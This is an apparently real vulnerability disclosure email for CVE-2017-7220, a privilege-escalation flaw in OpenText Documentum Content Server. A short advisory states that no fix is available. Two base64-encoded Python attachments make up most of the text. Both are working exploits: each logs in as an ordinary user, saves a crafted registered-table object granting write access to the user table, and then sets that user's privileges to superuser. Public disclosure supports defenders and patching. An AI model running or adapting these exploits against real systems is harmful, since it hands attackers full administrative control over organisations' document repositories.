CVE-2017-7220. OpenText Documentum Content Server: privilege evaluation using crafted RPC save-commands.

--B_3575488734_2111228562
Content-type: text/plain;
	charset="UTF-8"
Content-transfer-encoding: 7bit

CVE Identifier: CVE-2017-7220
Vendor: OpenText
Affected products: OpenText  Documentum Content Server (all versions)
Researcher: Andrey B. Panfilov
Severity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available
PoC: 

https://gist.github.com/andreybpanfilov/d8792484e13971982c0719ae59ab8c7c 
https://gist.github.com/andreybpanfilov/e0e60ae9d525a34cca04eb4c89a21e04


Description:

Initially this vulnerability was discovered in 2013 and was tracked by CERT/CC as VRF#HUFG9EBA (https://www.kb.cert.org/vuls/id/315340), vendor had undertaken a couple of attempts to remediate security flaw (see CVE-2014-2514 and http://seclists.org/bugtraq/2015/Aug/111 for complete description), but all of them was wrong. The issue still persists in all versions of Documentum Content Server.

__
Regards,
Andrey B. Panfilov



--B_3575488734_2111228562
Content-type: text/x-python-script; name="CVE-2017-7220-01.py"
Content-disposition: attachment;
	filename="CVE-2017-7220-01.py"
Content-transfer-encoding: base64


IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCgppbXBvcnQgc29ja2V0CmltcG9ydCBzeXMKZnJvbSBv
cy5wYXRoIGltcG9ydCBiYXNlbmFtZQoKZnJvbSBkY3RtcHkuZG9jYmFzZWNsaWVudCBpbXBv
cnQgRG9jYmFzZUNsaWVudApmcm9tIGRjdG1weS5vYmoudHlwZWRvYmplY3QgaW1wb3J0IFR5
cGVkT2JqZWN0CgpDSVBIRVJTID0gIkFMTDphTlVMTDohZU5VTEwiCgoKZGVmIHVzYWdlKCk6
CiAgICBwcmludCAidXNhZ2U6XG5cdCVzIGhvc3QgcG9ydCB1c2VyIHBhc3N3b3JkIiAlIGJh
c2VuYW1lKHN5cy5hcmd2WzBdKQoKCmRlZiBtYWluKCk6CiAgICBpZiBsZW4oc3lzLmFyZ3Yp
ICE9IDU6CiAgICAgICAgdXNhZ2UoKQogICAgICAgIGV4aXQoMSkKCiAgICBwcmludCAiVHJ5
aW5nIHRvIGNvbm5lY3QgdG8gJXM6JXMgYXMgJXMgLi4uIiAlIChzeXMuYXJndlsxXSwgc3lz
LmFyZ3ZbMl0sIHN5cy5hcmd2WzNdKQogICAgKHNlc3Npb24sIGRvY2Jhc2UpID0gY3JlYXRl
X3Nlc3Npb24oKnN5cy5hcmd2WzE6NV0pCgogICAgaWYgaXNfc3VwZXJfdXNlcihzZXNzaW9u
KToKICAgICAgICBwcmludCAiQ3VycmVudCB1c2VyIGlzIGEgc3VwZXJ1c2VyLCBub3RoaW5n
IHRvIGRvIgogICAgICAgIGV4aXQoMSkKCiAgICBwcmludCAiQWNxdWlyaW5nIElEIGZvciBt
YWxpY2lvdXMgb2JqZWN0IC4uLiIKICAgIGlkID0gc2Vzc2lvbi5uZXh0X2lkKDI1KQogICAg
cHJpbnQgIkFjcXVpcmVkICVzXG5UcnlpbmcgdG8gY3JlYXRlIGZvbGxvd2luZyBtYWxpY2lv
dXMgb2JqZWN0OiIgJSBpZAogICAgb2JqID0gVHlwZWRPYmplY3Qoc2Vzc2lvbj1zZXNzaW9u
KQogICAgb2JqLnNldF9zdHJpbmcoIk9CSkVDVF9UWVBFIiwgIkRNX1JFR0lTVEVSRUQiKQog
ICAgb2JqLnNldF9ib29sKCJJU19ORVdfT0JKRUNUIiwgVHJ1ZSkKICAgIG9iai5zZXRfaW50
KCJpX3ZzdGFtcCIsIDApCiAgICBvYmouc2V0X3N0cmluZygidGFibGVfbmFtZSIsICJkbV91
c2VyX3MiKQogICAgb2JqLnNldF9zdHJpbmcoInRhYmxlX293bmVyIiwgZG9jYmFzZSkKICAg
IG9iai5zZXRfc3RyaW5nKCJvd25lcl9uYW1lIiwgZG9jYmFzZSkKICAgIG9iai5zZXRfaW50
KCJ3b3JsZF9wZXJtaXQiLCA3KQogICAgb2JqLnNldF9zdHJpbmcoIm9iamVjdF9uYW1lIiwg
ImRtX3VzZXJfcyIpCiAgICBvYmouc2V0X3N0cmluZygicl9vYmplY3RfdHlwZSIsICJkbV9y
ZWdpc3RlcmVkIikKICAgIG9iai5zZXRfaW50KCJvd25lcl90YWJsZV9wZXJtaXQiLCAxNSkK
ICAgIG9iai5zZXRfaW50KCJncm91cF90YWJsZV9wZXJtaXQiLCAxNSkKICAgIG9iai5zZXRf
aW50KCJ3b3JsZF90YWJsZV9wZXJtaXQiLCAxNSkKICAgIHByaW50IG9iai5kdW1wKCkKICAg
IHIgPSBzZXNzaW9uLnN5c19vYmpfc2F2ZShpZCwgb2JqKQogICAgaWYgbm90IHI6CiAgICAg
ICAgcHJpbnQgIkZhaWxlZCIKICAgICAgICBleGl0KDEpCiAgICBwcmludCAiQmVjb21pbmcg
c3VwZXJ1c2VyLi4uIgogICAgciA9IHNlc3Npb24ucXVlcnkoCiAgICAgICAgIlVQREFURSBk
bV9kYm8uZG1fdXNlcl9zIFNFVCB1c2VyX3ByaXZpbGVnZXM9MTYgIgogICAgICAgICJXSEVS
RSB1c2VyX25hbWU9VVNFUiIpIFwKICAgICAgICAubmV4dF9yZWNvcmQoKVsncm93c191cGRh
dGVkJ10KICAgIGlmIHIgIT0gMToKICAgICAgICBwcmludCAiRmFpbGVkIgogICAgICAgIGV4
aXQoMSkKICAgIHByaW50ICJQMHduZWQhIgoKCmRlZiBjcmVhdGVfc2Vzc2lvbihob3N0LCBw
b3J0LCB1c2VyLCBwd2QsIGlkZW50aXR5PU5vbmUpOgogICAgcHJpbnQgIlRyeWluZyB0byBj
b25uZWN0IHRvICVzOiVzIGFzICVzIC4uLiIgJSBcCiAgICAgICAgICAoaG9zdCwgcG9ydCwg
dXNlcikKICAgIHNlc3Npb24gPSBOb25lCiAgICB0cnk6CiAgICAgICAgc2Vzc2lvbiA9IERv
Y2Jhc2VDbGllbnQoCiAgICAgICAgICAgIGhvc3Q9aG9zdCwgcG9ydD1pbnQocG9ydCksCiAg
ICAgICAgICAgIHVzZXJuYW1lPXVzZXIsIHBhc3N3b3JkPXB3ZCwKICAgICAgICAgICAgaWRl
bnRpdHk9aWRlbnRpdHkpCiAgICBleGNlcHQgc29ja2V0LmVycm9yLCBlOgogICAgICAgIGlm
IGUuZXJybm8gPT0gNTQ6CiAgICAgICAgICAgIHNlc3Npb24gPSBEb2NiYXNlQ2xpZW50KAog
ICAgICAgICAgICAgICAgaG9zdD1ob3N0LCBwb3J0PWludChwb3J0KSwKICAgICAgICAgICAg
ICAgIHVzZXJuYW1lPXVzZXIsIHBhc3N3b3JkPXB3ZCwKICAgICAgICAgICAgICAgIGlkZW50
aXR5PWlkZW50aXR5LAogICAgICAgICAgICAgICAgc2VjdXJlPVRydWUsIGNpcGhlcnM9Q0lQ
SEVSUykKICAgICAgICBlbHNlOgogICAgICAgICAgICByYWlzZSBlCiAgICBkb2NiYXNlID0g
c2Vzc2lvbi5kb2NiYXNlY29uZmlnWydvYmplY3RfbmFtZSddCiAgICB2ZXJzaW9uID0gc2Vz
c2lvbi5zZXJ2ZXJjb25maWdbJ3Jfc2VydmVyX3ZlcnNpb24nXQogICAgcHJpbnQgIkNvbm5l
Y3RlZCB0byAlczolcywgZG9jYmFzZTogJXMsIHZlcnNpb246ICVzIiAlIFwKICAgICAgICAg
IChob3N0LCBwb3J0LCBkb2NiYXNlLCB2ZXJzaW9uKQogICAgcmV0dXJuIChzZXNzaW9uLCBk
b2NiYXNlKQoKCmRlZiBpc19zdXBlcl91c2VyKHNlc3Npb24pOgogICAgdXNlciA9IHNlc3Np
b24uZ2V0X2J5X3F1YWxpZmljYXRpb24oCiAgICAgICAgImRtX3VzZXIgV0hFUkUgdXNlcl9u
YW1lPVVTRVIiKQogICAgaWYgdXNlclsndXNlcl9wcml2aWxlZ2VzJ10gPT0gMTY6CiAgICAg
ICAgcmV0dXJuIFRydWUKICAgIGdyb3VwID0gc2Vzc2lvbi5nZXRfYnlfcXVhbGlmaWNhdGlv
bigKICAgICAgICAiZG1fZ3JvdXAgd2hlcmUgZ3JvdXBfbmFtZT0nZG1fc3VwZXJ1c2Vycycg
IgogICAgICAgICJBTkQgYW55IGlfYWxsX3VzZXJzX25hbWVzPVVTRVIiKQogICAgaWYgZ3Jv
dXAgaXMgbm90IE5vbmU6CiAgICAgICAgcmV0dXJuIFRydWUKCiAgICByZXR1cm4gRmFsc2UK
CgppZiBfX25hbWVfXyA9PSAnX19tYWluX18nOgogICAgbWFpbigpCg==
--B_3575488734_2111228562
Content-type: text/x-python-script; name="CVE-2017-7220-02.py"
Content-disposition: attachment;
	filename="CVE-2017-7220-02.py"
Content-transfer-encoding: base64


IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCgppbXBvcnQgc29ja2V0CmltcG9ydCBzeXMKZnJvbSBv
cy5wYXRoIGltcG9ydCBiYXNlbmFtZQoKZnJvbSBkY3RtcHkuZG9jYmFzZWNsaWVudCBpbXBv
cnQgRG9jYmFzZUNsaWVudApmcm9tIGRjdG1weS5vYmoudHlwZWRvYmplY3QgaW1wb3J0IFR5
cGVkT2JqZWN0CgpDSVBIRVJTID0gIkFMTDphTlVMTDohZU5VTEwiCgoKZGVmIHVzYWdlKCk6
CiAgICBwcmludCAidXNhZ2U6XG5cdCVzIGhvc3QgcG9ydCB1c2VyIHBhc3N3b3JkIiAlIGJh
c2VuYW1lKHN5cy5hcmd2WzBdKQoKCmRlZiBtYWluKCk6CiAgICBpZiBsZW4oc3lzLmFyZ3Yp
ICE9IDU6CiAgICAgICAgdXNhZ2UoKQogICAgICAgIGV4aXQoMSkKCiAgICBwcmludCAiVHJ5
aW5nIHRvIGNvbm5lY3QgdG8gJXM6JXMgYXMgJXMgLi4uIiAlIChzeXMuYXJndlsxXSwgc3lz
LmFyZ3ZbMl0sIHN5cy5hcmd2WzNdKQogICAgKHNlc3Npb24sIGRvY2Jhc2UpID0gY3JlYXRl
X3Nlc3Npb24oKnN5cy5hcmd2WzE6NV0pCgogICAgaWYgaXNfc3VwZXJfdXNlcihzZXNzaW9u
KToKICAgICAgICBwcmludCAiQ3VycmVudCB1c2VyIGlzIGEgc3VwZXJ1c2VyLCBub3RoaW5n
IHRvIGRvIgogICAgICAgIGV4aXQoMSkKCiAgICBwcmludCAiQWNxdWlyaW5nIElEIGZvciBt
YWxpY2lvdXMgb2JqZWN0IC4uLiIKICAgIGlkID0gc2Vzc2lvbi5uZXh0X2lkKDB4MDApCiAg
ICBwcmludCAiQWNxdWlyZWQgJXNcblRyeWluZyB0byBjcmVhdGUgZm9sbG93aW5nIG1hbGlj
aW91cyBvYmplY3Q6IiAlIGlkCiAgICBvYmogPSBUeXBlZE9iamVjdChzZXNzaW9uPXNlc3Np
b24pCiAgICBvYmouc2V0X3N0cmluZygiT0JKRUNUX1RZUEUiLCAiZG1fcmVnaXN0ZXJlZCIp
CiAgICBvYmouc2V0X2Jvb2woIklTX05FV19PQkpFQ1QiLCBUcnVlKQogICAgb2JqLnNldF9p
bnQoImlfdnN0YW1wIiwgMCkKICAgIG9iai5zZXRfc3RyaW5nKCJ0YWJsZV9uYW1lIiwgImRt
X3VzZXJfcyIpCiAgICBvYmouc2V0X3N0cmluZygidGFibGVfb3duZXIiLCBkb2NiYXNlKQog
ICAgb2JqLnNldF9zdHJpbmcoIm93bmVyX25hbWUiLCBkb2NiYXNlKQogICAgb2JqLnNldF9p
bnQoIndvcmxkX3Blcm1pdCIsIDcpCiAgICBvYmouc2V0X3N0cmluZygib2JqZWN0X25hbWUi
LCAiZG1fdXNlcl9zIikKICAgIG9iai5zZXRfc3RyaW5nKCJyX29iamVjdF90eXBlIiwgImRt
X3JlZ2lzdGVyZWQiKQogICAgb2JqLnNldF9pbnQoIm93bmVyX3RhYmxlX3Blcm1pdCIsIDE1
KQogICAgb2JqLnNldF9pbnQoImdyb3VwX3RhYmxlX3Blcm1pdCIsIDE1KQogICAgb2JqLnNl
dF9pbnQoIndvcmxkX3RhYmxlX3Blcm1pdCIsIDE1KQogICAgcHJpbnQgb2JqLmR1bXAoKQog
ICAgaWYgbm90IHNlc3Npb24uc2F2ZShpZCwgb2JqKToKICAgICAgICBwcmludCAiRmFpbGVk
IgogICAgICAgIGV4aXQoMSkKICAgIHByaW50ICJCZWNvbWluZyBzdXBlcnVzZXIuLi4iCiAg
ICByID0gc2Vzc2lvbi5xdWVyeSgKICAgICAgICAiVVBEQVRFIGRtX2Riby5kbV91c2VyX3Mg
U0VUICIKICAgICAgICAidXNlcl9wcml2aWxlZ2VzPTE2IFdIRVJFIHVzZXJfbmFtZT1VU0VS
IikgXAogICAgICAgIC5uZXh0X3JlY29yZCgpWwogICAgICAgICdyb3dzX3VwZGF0ZWQnXQog
ICAgaWYgciAhPSAxOgogICAgICAgIHByaW50ICJGYWlsZWQiCiAgICAgICAgZXhpdCgxKQog
ICAgcHJpbnQgIlAwd25lZCEiCgoKZGVmIGNyZWF0ZV9zZXNzaW9uKGhvc3QsIHBvcnQsIHVz
ZXIsIHB3ZCwgaWRlbnRpdHk9Tm9uZSk6CiAgICBwcmludCAiVHJ5aW5nIHRvIGNvbm5lY3Qg
dG8gJXM6JXMgYXMgJXMgLi4uIiAlIFwKICAgICAgICAgIChob3N0LCBwb3J0LCB1c2VyKQog
ICAgc2Vzc2lvbiA9IE5vbmUKICAgIHRyeToKICAgICAgICBzZXNzaW9uID0gRG9jYmFzZUNs
aWVudCgKICAgICAgICAgICAgaG9zdD1ob3N0LCBwb3J0PWludChwb3J0KSwKICAgICAgICAg
ICAgdXNlcm5hbWU9dXNlciwgcGFzc3dvcmQ9cHdkLAogICAgICAgICAgICBpZGVudGl0eT1p
ZGVudGl0eSkKICAgIGV4Y2VwdCBzb2NrZXQuZXJyb3IsIGU6CiAgICAgICAgaWYgZS5lcnJu
byA9PSA1NDoKICAgICAgICAgICAgc2Vzc2lvbiA9IERvY2Jhc2VDbGllbnQoCiAgICAgICAg
ICAgICAgICBob3N0PWhvc3QsIHBvcnQ9aW50KHBvcnQpLAogICAgICAgICAgICAgICAgdXNl
cm5hbWU9dXNlciwgcGFzc3dvcmQ9cHdkLAogICAgICAgICAgICAgICAgaWRlbnRpdHk9aWRl
bnRpdHksCiAgICAgICAgICAgICAgICBzZWN1cmU9VHJ1ZSwgY2lwaGVycz1DSVBIRVJTKQog
ICAgICAgIGVsc2U6CiAgICAgICAgICAgIHJhaXNlIGUKICAgIGRvY2Jhc2UgPSBzZXNzaW9u
LmRvY2Jhc2Vjb25maWdbJ29iamVjdF9uYW1lJ10KICAgIHZlcnNpb24gPSBzZXNzaW9uLnNl
cnZlcmNvbmZpZ1sncl9zZXJ2ZXJfdmVyc2lvbiddCiAgICBwcmludCAiQ29ubmVjdGVkIHRv
ICVzOiVzLCBkb2NiYXNlOiAlcywgdmVyc2lvbjogJXMiICUgXAogICAgICAgICAgKGhvc3Qs
IHBvcnQsIGRvY2Jhc2UsIHZlcnNpb24pCiAgICByZXR1cm4gKHNlc3Npb24sIGRvY2Jhc2Up
CgoKZGVmIGlzX3N1cGVyX3VzZXIoc2Vzc2lvbik6CiAgICB1c2VyID0gc2Vzc2lvbi5nZXRf
YnlfcXVhbGlmaWNhdGlvbigKICAgICAgICAiZG1fdXNlciBXSEVSRSB1c2VyX25hbWU9VVNF
UiIpCiAgICBpZiB1c2VyWyd1c2VyX3ByaXZpbGVnZXMnXSA9PSAxNjoKICAgICAgICByZXR1
cm4gVHJ1ZQogICAgZ3JvdXAgPSBzZXNzaW9uLmdldF9ieV9xdWFsaWZpY2F0aW9uKAogICAg
ICAgICJkbV9ncm91cCB3aGVyZSBncm91cF9uYW1lPSdkbV9zdXBlcnVzZXJzJyAiCiAgICAg
ICAgIkFORCBhbnkgaV9hbGxfdXNlcnNfbmFtZXM9VVNFUiIpCiAgICBpZiBncm91cCBpcyBu
b3QgTm9uZToKICAgICAgICByZXR1cm4gVHJ1ZQoKICAgIHJldHVybiBGYWxzZQoKCmlmIF9f
bmFtZV9fID09ICdfX21haW5fXyc6CiAgICBtYWluKCkK
--B_3575488734_2111228562--